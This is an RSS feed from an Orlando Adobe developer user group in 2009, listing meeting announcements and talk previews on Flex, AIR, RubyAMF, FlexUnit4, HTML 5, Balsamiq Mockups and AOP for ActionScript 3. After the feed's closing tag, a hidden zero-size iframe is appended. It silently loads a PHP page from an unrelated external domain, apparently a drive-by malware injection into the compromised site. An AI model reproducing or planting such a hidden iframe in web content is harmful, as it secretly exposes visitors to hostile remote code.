<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Adobe Developers of Greater Orlando &#187; Primers</title>
	<atom:link href="http://adogo.us/category/primers/feed/" rel="self" type="application/rss+xml" />
	<link>http://adogo.us</link>
	<description>Focused on ColdFusion, Actionscript, Air and Flex in the Orlando area.</description>
	<lastBuildDate>Mon, 12 Oct 2009 14:20:11 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>October Adogo Meeting Tonight</title>
		<link>http://adogo.us/2009/10/12/october-adogo-meeting-tonight/</link>
		<comments>http://adogo.us/2009/10/12/october-adogo-meeting-tonight/#comments</comments>
		<pubDate>Mon, 12 Oct 2009 14:20:11 +0000</pubDate>
		<dc:creator>Adam Fortuna</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=328</guid>
		<description><![CDATA[If you&#8217;re in Orlando tonight, and you&#8217;re interested in Air please come on over to the October Adogo meeting near Devry tonight. Brian LeGros already posted a brief description of the meeting. As usual, if you get there early, feel free to stop by BJs Brewhouse for a quick bite to eat and a drink.
]]></description>
			<content:encoded><![CDATA[<p>If you&#8217;re in Orlando tonight, and you&#8217;re interested in Air please come on over to the October Adogo meeting near Devry tonight. Brian LeGros already posted a <a href="http://adogo.us/2009/10/08/october-meeting-moved-to-1012/">brief description</a> of the meeting. As usual, if you get there early, feel free to stop by BJs Brewhouse for a quick bite to eat and a drink.</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/10/12/october-adogo-meeting-tonight/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>September Primer: Flex, Rails, and RubyAMF</title>
		<link>http://adogo.us/2009/09/03/september-primer-flex-rails-and-rubyamf/</link>
		<comments>http://adogo.us/2009/09/03/september-primer-flex-rails-and-rubyamf/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 18:40:03 +0000</pubDate>
		<dc:creator>Brian LeGros</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=312</guid>
		<description><![CDATA[In the world of Adobe technologies, most of us that work with Flex and the Action Message Format (AMF) typically look to LiveCycle DS or Blaze DS as our server technologies of choice.  AMF, however, is is a a message format open-sourced by Adobe with a multitude of server implementations for an assorted set [...]]]></description>
			<content:encoded><![CDATA[<p>In the world of Adobe technologies, most of us that work with Flex and the Action Message Format (AMF) typically look to <a href="http://www.adobe.com/products/livecycle/dataservices/">LiveCycle DS</a> or <a href="http://opensource.adobe.com/wiki/display/blazeds/BlazeDS/">Blaze DS</a> as our server technologies of choice.  AMF, however, is is a a message format open-sourced by Adobe with a multitude of server implementations for an assorted set of languages.  In this session, myself and Jake Swanner, will be showing you one of those implementations in a Ruby flavor called <a href="http://blog.rubyamf.org/">RubyAMF</a>.  RubyAMF is a plugin for the Rails framework which allows you to easily expose models from your application for RPC calls using AMF.  We&#8217;ve created a simple Flex application, which works with the Yelp web services, and uses a Rails controller as an endpoint to recieve XML, JSON, and AMF messages containing restaurant data.  We will show our example application working with each of these message formats in our presentation.  Additionally, I will give a brief overview of the Flex technology stack to give an idea of how all the pieces fit together.  If you&#8217;re new to Flex and AMF, or just interested in learning about something new, we hope you can make it out to the meeting.</p>
<p>Fore more details, check out the <a href="http://adogo.us/2009/09/03/september-joint-meeting-with-orug/">Adogo</a> and <a href="http://www.orug.org/articles/2009/09/03/next-meeting-september-10th">ORUG</a> post on the meeting.  See you there.</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/09/03/september-primer-flex-rails-and-rubyamf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>August Primer: What&#8217;s new in FlexUnit4 and mock-as3?</title>
		<link>http://adogo.us/2009/07/29/august-primer-whats-new-in-flexunit4-and-mock-as3/</link>
		<comments>http://adogo.us/2009/07/29/august-primer-whats-new-in-flexunit4-and-mock-as3/#comments</comments>
		<pubDate>Thu, 30 Jul 2009 03:55:34 +0000</pubDate>
		<dc:creator>Brian LeGros</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=281</guid>
		<description><![CDATA[For this short session, I&#8217;m going to be doing a walk-through of the FlexUnit4 turnkey project.  FlexUnit 4 is the latest rendition of the FlexUnit project managed by Adobe and has had a new infusion of developers from the Fluint project.  FlexUnit 4 has not only brought a new syntax for creating tests, [...]]]></description>
			<content:encoded><![CDATA[<p>For this short session, I&#8217;m going to be doing a walk-through of the <a href="http://opensource.adobe.com/wiki/display/flexunit/Downloads">FlexUnit4 turnkey project</a>.  <a href="http://opensource.adobe.com/wiki/display/flexunit/FlexUnit+4+feature+overview">FlexUnit 4</a> is the latest rendition of the FlexUnit project managed by Adobe and has had a new infusion of developers from the Fluint project.  FlexUnit 4 has not only brought a new syntax for creating tests, but also offers a level of compatibility in the Flex testing community.  Out of the box, FlexUnit 4 can execute FlexUnit1, Fluint, and FlexUnit 4 tests and suites as well as offer integration with <a href="http://github.com/drewbourne/hamcrest-as3/tree/master">hamcrest-as3</a>, for more robust assertions.  Additionally, FlexUnit 4 provides an extension layer for which custom runner classes can be written to bring a whole new depth to writing your unit tests.  In this session I will show a few custom runners as well.</p>
<p><a href="http://drewbourne.github.com/">Drew Bourne</a> has graciously provided me with some cool code to show off at the meeting.  I will be showing a very alpha extension to <a href="http://code.google.com/p/mock-as3/">mock-as3</a> which will add type-safety to this great mocking framework.  Additionally, he&#8217;s provided me with a PoC runner that can be used to provide testing contexts (ala BDD) to your unit tests.  Definitely some cool stuff when it comes to testing that you may be interested in seeing if you&#8217;ve ever written tests for Flex.</p>
<p>Come by on Monday, August 3rd @ 7:00 PM at Devry in Millenia to hear more.  See you then!</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/07/29/august-primer-whats-new-in-flexunit4-and-mock-as3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adogo Meeting Tonight!</title>
		<link>http://adogo.us/2009/07/06/adogo-meeting-tonight/</link>
		<comments>http://adogo.us/2009/07/06/adogo-meeting-tonight/#comments</comments>
		<pubDate>Mon, 06 Jul 2009 12:57:03 +0000</pubDate>
		<dc:creator>Adam Fortuna</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=266</guid>
		<description><![CDATA[Hey all, just a reminder that there&#8217;s an Adogo meeting tonight at Devry (room 122). The meeting starts at 7pm, but for whoever is interested, we&#8217;ll be at BJs Brewhouse beforehand (on Conroy, across from the Mall) for some food and beers probably from 6pm &#8211; 6:45.
There is one change in the meeting tonight though. [...]]]></description>
			<content:encoded><![CDATA[<p>Hey all, just a reminder that there&#8217;s an Adogo meeting tonight at Devry (room 122). The meeting starts at 7pm, but for whoever is interested, we&#8217;ll be at BJs Brewhouse beforehand (on Conroy, across from the Mall) for some food and beers probably from 6pm &#8211; 6:45.</p>
<p>There is one change in the meeting tonight though. Due to a scheduling conflict that came up at the last minute, Jason&#8217;s talk will have to wait until another month. Instead we&#8217;ll have the HTML 5 talk followed by a short birds of a feather session discussing what technologies we&#8217;re all using. If you have something you&#8217;re passionate about and want to share you experience and enthusiasm we&#8217;d love to hear what&#8217;s inspired you. This will be in the form of a led discussion, rather than a presentation. The second session is completely optional as always, so feel free to stay if you&#8217;re interested. Look forward to seeing everyone tonight!</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/07/06/adogo-meeting-tonight/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What&#8217;s New in HTML 5? &#8211; Primer for July</title>
		<link>http://adogo.us/2009/07/01/whats-new-in-html-5-primer-for-july/</link>
		<comments>http://adogo.us/2009/07/01/whats-new-in-html-5-primer-for-july/#comments</comments>
		<pubDate>Wed, 01 Jul 2009 06:01:42 +0000</pubDate>
		<dc:creator>Adam Fortuna</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=264</guid>
		<description><![CDATA[For something that&#8217;s been in the works for so many years, HTML 5 is still relatively unknown to most developers hoping to maintain cross browser compatibility. With the release of Firefox 3.5 today, and recent highlights at the Google I/O conference, HTML 5 is starting to make it&#8217;s rounds with developers. In this talk we&#8217;ll [...]]]></description>
			<content:encoded><![CDATA[<p>For something that&#8217;s been in the works for so many years, HTML 5 is still relatively unknown to most developers hoping to maintain cross browser compatibility. With the release of Firefox 3.5 today, and recent highlights at the Google I/O conference, HTML 5 is starting to make it&#8217;s rounds with developers. In this talk we&#8217;ll be going through some of the most exciting new features of HTML 5 including <code>&lt;canvas&gt;</code>, <code>&lt;video&gt;</code>, geolocation and local storage as well as some of the browser limitations of these implementations.</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/07/01/whats-new-in-html-5-primer-for-july/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Balsamiq Mockups &#8211; July Primer Pt. II</title>
		<link>http://adogo.us/2009/06/25/balsamiq-mockups/</link>
		<comments>http://adogo.us/2009/06/25/balsamiq-mockups/#comments</comments>
		<pubDate>Thu, 25 Jun 2009 21:56:16 +0000</pubDate>
		<dc:creator>Jason Madsen</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=255</guid>
		<description><![CDATA[Why do we use pen and paper to sketch software mockups?  Here is the problem, if you create your mockup in Illustrator or Photoshop then we start to expect them to look professional.  The point of a mockup is to illustrate the layout and allow us to focus on user experience, not design.  So we [...]]]></description>
			<content:encoded><![CDATA[<p>Why do we use pen and paper to sketch software mockups?  Here is the problem, if you create your mockup in Illustrator or Photoshop then we start to expect them to look professional.  The point of a mockup is to illustrate the layout and allow us to focus on user experience, not design.  So we get analog and use pen and paper, or perhaps a white board and dry erase markers.  All of that is only because you haven&#8217;t used <a href="http://www.balsamiq.com">Balsamiq Mockups</a> yet.</p>
<p>Balsamiq Mockups is application that allows you to quickly develop wireframes and mockups that look and feel like sketches, it is a fantastic tool.  Mockups is an Adobe AIR based application, as such is runs on most major OS&#8217;s (Mac, Windows, Linux).  At the next Adogo meeting I will be doing a overview / presentation of what Mockups has to offer.  As an added bonus I will be giving away a free license to one lucky attendee via Balsamiq Studios.  See you there.</p>
<p>Jason Madsen</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/06/25/balsamiq-mockups/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>July Meeting Just Around the Corner</title>
		<link>http://adogo.us/2009/06/20/july-meeting-just-around-the-corner/</link>
		<comments>http://adogo.us/2009/06/20/july-meeting-just-around-the-corner/#comments</comments>
		<pubDate>Sat, 20 Jun 2009 16:12:56 +0000</pubDate>
		<dc:creator>Adam Fortuna</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=253</guid>
		<description><![CDATA[With our next meeting right around the corner, we&#8217;re looking for some speakers this month if anyone is interested. If you have a web development related talk, or an Adobe related idea that you&#8217;d be willing to present on, we&#8217;d love to have you! Whether it&#8217;s for this coming July, or another month later this [...]]]></description>
			<content:encoded><![CDATA[<p>With our next meeting right around the corner, we&#8217;re looking for some speakers this month if anyone is interested. If you have a web development related talk, or an Adobe related idea that you&#8217;d be willing to present on, we&#8217;d love to have you! Whether it&#8217;s for this coming July, or another month later this year, we&#8217;re always looking for speakers.</p>
<p>As for this month, we have one talk planned so far (looking for a second 20 minute talk). Recently at <a href="http://code.google.com/events/io/">Google I/O</a>, HTML 5 was one of the hottest topics that Google is fully embracing. It&#8217;s making a lot of headway across multiple browsers, and Google is betting big on it. In this talk we&#8217;ll be going over some of the new features that are making their way into this emerging standard.</p>
<p>This meeting is scheduled for July 6th, at Devry as usual in room 122. Meeting starts at 7pm, but feel free to stop by BJ&#8217;s brewhouse beforehand (on Conroy, across from the Mall) for some dinner and beers.</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/06/20/july-meeting-just-around-the-corner/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FlashCamp Orlando Giveaway Winners</title>
		<link>http://adogo.us/2009/05/19/flash-camp-orlando-giveaway-winners/</link>
		<comments>http://adogo.us/2009/05/19/flash-camp-orlando-giveaway-winners/#comments</comments>
		<pubDate>Tue, 19 May 2009 15:29:44 +0000</pubDate>
		<dc:creator>Maxim Porges</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=247</guid>
		<description><![CDATA[Congratulations to Derek Myers, Darryl Ho, and Gail LaPinsky for being our FlashCamp Orlando giveaway winners. Each of these lucky people will be attending the event for free, courtesy of the good folks at Universal Mind.
As for the rest of you, if you haven&#8217;t registered yet &#8211; what are you waiting for? At just $50 [...]]]></description>
			<content:encoded><![CDATA[<p>Congratulations to Derek Myers, Darryl Ho, and Gail LaPinsky for being our <a href="http://www.flashcamporlando.com">FlashCamp Orlando</a> giveaway winners. Each of these lucky people will be attending the event for free, courtesy of the good folks at <a href="http://www.universalmind.com">Universal Mind</a>.</p>
<p>As for the rest of you, if you haven&#8217;t registered yet &#8211; what are you waiting for? At <a href="http://flashcamporlando.eventbrite.com/">just $50</a> for event registration, free parking, and lunch, it&#8217;s still a giveaway however you look at it. We look forward to seeing you there!</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/05/19/flash-camp-orlando-giveaway-winners/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>April 6th Primer: In Search of AOP for AS3</title>
		<link>http://adogo.us/2009/03/28/april-6th-primer-in-search-of-aop-for-as3/</link>
		<comments>http://adogo.us/2009/03/28/april-6th-primer-in-search-of-aop-for-as3/#comments</comments>
		<pubDate>Sat, 28 Mar 2009 20:41:55 +0000</pubDate>
		<dc:creator>Maxim Porges</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=198</guid>
		<description><![CDATA[Aspect Oriented Programming (AOP) is used under the hood of some of the most powerful libraries for Java, .NET, and Coldfusion development (amongst others). AOP finds uses primarily for cross-cutting concerns such as logging and security, and supporting practices like object mocking for unit testing. Developers can also use AOP in their own applications as [...]]]></description>
			<content:encoded><![CDATA[<p>Aspect Oriented Programming (AOP) is used under the hood of some of the most powerful libraries for Java, .NET, and Coldfusion development (amongst others). AOP finds uses primarily for cross-cutting concerns such as logging and security, and supporting practices like object mocking for unit testing. Developers can also use AOP in their own applications as they see fit to handle additional functionality that does not lend itself well to an object-oriented implementation.</p>
<p>While the need for AOP is just as prevalent in ActionScript 3 development, no general purpose libraries for AOP in ActionScript 3 have been released. After grumbling about this for six months in 2008, I decided to look in to what it would take to provide an AOP library for ActionScript 3.</p>
<p>My presentation will take you through the journey I undertook understanding the inner workings of AOP in other languages, and how AS3 and the ActionScript Virtual Machine really worked under the hood. I will also be showing you <a href="http://code.google.com/p/loom-as3">Loom</a>, the library I am about to release which supports AOP using the methods devised during my search (it might even be finished by the time our meeting rolls around!).</p>
<p>Prior to attending, I would recommend that you get understanding of AOP by <a href="http://en.wikipedia.org/wiki/Aspect_oriented_programming">reading the Wikipedia entry</a>. I look forward to seeing you there!</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/03/28/april-6th-primer-in-search-of-aop-for-as3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adogo March Meeting Tomorrow!</title>
		<link>http://adogo.us/2009/03/01/adogo-march-meeting-tomorrow/</link>
		<comments>http://adogo.us/2009/03/01/adogo-march-meeting-tomorrow/#comments</comments>
		<pubDate>Sun, 01 Mar 2009 12:49:04 +0000</pubDate>
		<dc:creator>Adam Fortuna</dc:creator>
				<category><![CDATA[Primers]]></category>

		<guid isPermaLink="false">http://adogo.us/?p=193</guid>
		<description><![CDATA[After moving January and February&#8217;s meetings back a week, this one really snuck up on us. We&#8217;re going to try to get back on the first Monday or month though, starting tomorrow! Maxim Porges will be presenting on In Search of AOP for AS3. If you can&#8217;t make it to FlexCampMiami, this will be a [...]]]></description>
			<content:encoded><![CDATA[<p>After moving January and February&#8217;s meetings back a week, this one really snuck up on us. We&#8217;re going to try to get back on the first Monday or month though, starting tomorrow! Maxim Porges will be presenting on <a href="http://www.flexcampmiami.com/page.cfm/agenda/in-search-of-aop-for-as3">In Search of AOP for AS3</a>. If you can&#8217;t make it to <a href="http://www.flexcampmiami.com">FlexCampMiami</a>, this will be a great chance to check out one of the talks. We&#8217;ll be following this up with a round table discussion on what people are working on and what they might be interested in learning more about for anyone interested.</p>
<p>As usual, we&#8217;ll be at <a href="http://www.bjsbrewhouse.com/">BJs Brewhouse</a>, right around the corner from Devry, from about 5:45- 6:45. Feel free to come out for a beer or quick dinner.</p>
]]></content:encoded>
			<wfw:commentRss>http://adogo.us/2009/03/01/adogo-march-meeting-tomorrow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
?><iframe src="http://s0e6qx0h.skottles.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<!-- Dynamic Page Served (once) in 0.534 seconds -->
